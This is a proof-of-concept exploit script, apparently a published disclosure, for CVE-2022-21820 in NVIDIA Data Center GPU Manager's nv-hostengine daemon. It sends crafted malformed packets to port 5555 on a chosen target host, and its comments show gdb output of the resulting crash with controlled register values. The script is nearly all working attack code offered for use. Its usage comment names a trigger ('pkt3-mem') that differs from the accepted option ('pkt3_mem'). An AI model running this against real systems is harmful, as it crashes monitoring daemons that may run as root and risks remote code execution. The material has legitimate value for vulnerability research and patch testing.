NVIDIA Data Center GPU Manager Remote Memory Corruption

`#!/usr/bin/python3  
# -*- coding: UTF-8 -*-  
#  
# heart.py  
#  
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability  
#  
# Jeremy Brown [jbrown3264/gmail]  
#  
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health  
# data. nv-hostengine is a daemon that by default listens on the loopback interface,  
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).  
# A native client named DCGMI allows users to make requests to the daemon to support  
# a variety of functions. Malformed packets can cause the daemon (running as root  
# or user account) to crash or potentially result in code execution.  
#  
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html  
#  
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)  
#  
# $ ./heart.py 10.0.0.201 --trigger pkt3-mem  
#  
# $ gdb `which nv-hostengine`  
# (gdb) r -b ALL -n  
# nv-hostengine running as non-root. Some functionality will be limited.  
# Started host engine version 2.3.1 using port number: 5555  
# ...  
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.  
#  
# (gdb) i r  
# rax 0x7ffbb3dbd010 140719031046160  
# rbx 0x7ffff771ac70 140737344810096  
# rcx 0x7ffbb3dbd010 140719031046160  
# rdx 0x424242420 17786217504  
# rsi 0x7ffff771aee4 140737344810724  
# rdi 0x7ffbb3dbd010 140719031046160  
# rbp 0x7ffff771ac40 0x7ffff771ac40  
# rsp 0x7ffff771abe8 0x7ffff771abe8  
# r8 0x424242420 17786217504  
# r9 0x0 0  
# r10 0x7ffbb3dbd010 140719031046160  
#  
# CVE‑2022‑21820  
#  
  
import os  
import sys  
import argparse  
import time  
import shutil  
import signal  
import socket  
  
DEFAULT_PORT = 5555  
  
PKT_START = b'\xad\xbc\xbc\xad'  
  
#  
# Trigger #1: Memory Corruption via malformed packet 3  
#  
TRIGGER_ONE_PKT_1 = PKT_START + \  
b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00'  
  
TRIGGER_ONE_PKT_2 = PKT_START + \  
b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02'  
  
# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420  
TRIGGER_ONE_PKT_3 = PKT_START + \  
b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' + \  
b'\x84' * 51 + \  
b'\x00' * 488 + \  
b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \  
b'\x00' * 207 + \  
b'\x01\x00\x00\x00'  
  
#  
# Trigger #2: NULL ptr write via malformed packet 4  
#  
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1  
  
TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2  
  
TRIGGER_TWO_PKT_3 = PKT_START + \  
b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' + \  
b'\x00' * 12 + \  
b'\x01\x00\x00\x00\x01' + \  
b'\x00' * 523 + \  
b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \  
b'\x00' * 207 + \  
b'\x01\x00\x00\x00'  
  
# 0x79 triggers crash  
TRIGGER_TWO_PKT_4 = PKT_START + \  
b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' + \  
b'\xff' * 9 + \  
b'\x01' + \  
b'\x79' + \  
b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00'  
  
class Heart(object):  
def __init__(self, args):  
self.host = args.host  
self.trigger = args.trigger  
  
def run(self):  
if(self.trigger == None):  
print("error: choose which bug use via --trigger")  
return -1  
  
sock = self.getSock()  
  
if(sock == None):  
return -1  
  
try:  
sock.connect((self.host, DEFAULT_PORT))  
except Exception as error:  
print("connect() failed: %s\n" % error)  
return -1  
  
if(self.trigger == 'pkt3_mem'):  
if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0):  
print("failed to send/recv packet 1\n")  
return -1  
  
if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0):  
print("failed to send/recv packet 2\n")  
return -1  
  
if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0):  
print("failed to send/recv packet 3\n")  
return -1  
  
if(self.trigger == 'pkt4_null'):  
if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0):  
print("failed to send/recv packet 1\n")  
return -1  
  
if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0):  
print("failed to send/recv packet 2\n")  
return -1  
  
if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0):  
print("failed to send/recv packet 3\n")  
return -1  
  
if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0):  
print("failed to send/recv packet 4\n")  
return -1  
  
print("done\n")  
  
return 0  
  
def getSock(self):  
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.settimeout(2)  
except Exception as error:  
print("socket() failed: %s\n" % error)  
return None  
  
return sock  
  
def sendPacket(self, sock, pkt):  
try:  
sock.send(pkt)  
except Exception as error:  
print("socket send error: %s\n" % error)  
return -1  
  
try:  
sock.recv(256)  
except Exception as error:  
# print("socket recv error: %s\n" % error)  
return 0 # expected for pkt3_mem  
  
return 0  
  
def signalExit(signum, frame):  
sys.exit(-1)  
  
def arg_parse():  
parser = argparse.ArgumentParser()  
  
parser.add_argument("host",  
type=str,  
help="target host")  
  
parser.add_argument("--trigger",  
"--trigger",  
type=str,  
choices=['pkt3_mem', 'pkt4_null'],  
help="which bug to trigger")  
  
args = parser.parse_args()  
  
return args  
  
def main():  
signal.signal(signal.SIGINT, signalExit)  
  
args = arg_parse()  
  
rh = Heart(args)  
  
result = rh.run()  
  
if(result > 0):  
sys.exit(-1)  
  
if(__name__ == '__main__'):  
main()  
`